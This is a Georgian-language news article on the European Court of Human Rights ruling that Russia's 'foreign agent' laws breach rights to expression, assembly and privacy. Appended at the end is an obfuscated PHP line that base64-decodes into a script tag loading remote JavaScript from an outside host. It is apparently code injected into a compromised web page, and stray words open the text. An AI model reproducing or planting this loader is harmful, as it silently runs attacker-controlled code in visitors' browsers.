celsiusi
ავერსი შნაიდერი

რუსეთის კანონები, რომლებიც ბევრ აქტივისტს, მედია ორგანიზაციასა და ფიზიკურ პირს „უცხოურ აგენტებად“ რეგისტრაციას ავალდებულებს, ადამიანის უფლებებს არღვევს, - ამის შესახებ ადამიანის უფლებათა ევროპული სასამართლოს მიერ საქმის „ქობალია და სხვები რუსეთის წინააღმდეგ“ განხილვის შემდეგ გამოქვეყნებულ დადგენილებაშია ნათქვამია.

„სასამართლომ დაადგინა, რომ მოქმედი კანონმდებლობა სტიგმატიზებული ხასიათისაა, შეცდომაში შემყვანია და გამოყენებულია ფართო და არაპროგნოზირებადი მნიშვნელობით. ამან სასამართლომ მიიყვანა დასკვნამდე, რომ კანონმდებლობის მიზანი დასჯა და დაშინება იყო და არა გამჭირვალობის საჭიროების ან ეროვნული უსაფრთხოების შესახებ ლეგიტიმური საზრუნავის გათვალისწინება“, - ნათქვამია ადამიანის უფლებათა ევროპული სასამართლოს დადგენილებაში.

მოსამართლეებმა დაადგინეს, რომ რუსეთმა დაარღვია მოსარჩელეთა უფლებები სიტყვისა და შეკრების თავისუფლების შესახებ, ადამიანის უფლებათა ევროპული კონვენციის მე-10 და მე-11 მუხლები, ისევე როგორც მე-8 მუხლის საფუძველზე პირადი ცხოვრების ხელშეუხებლობის უფლება.

„სასამართლომ დაადგინა, რომ საკანონმდებლო ჩარჩო 2012 წლის შემდეგ უფრო შემზღუდველი გახდა, რამაც არასამთავრობო ორგანიზაციების, მედია ორგანიზაციებისა და ფიზიკური პირების გაცილებით მეტ რაოდენობაზე მოახდინა გავლენა და კონვენციის სტანდარტებს უფრო დაშორდა“, - აღნიშნულია დადგენილებაში.

ცნობისთვის, რუსეთის წინააღმდეგ საქმე 107-მა მოსარჩელემ აღძრა, მათ შორის არასამთავრობო ორგანიზაციებმა და მედია ორგანიზაციების წარმომადგენლებმა.

69
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");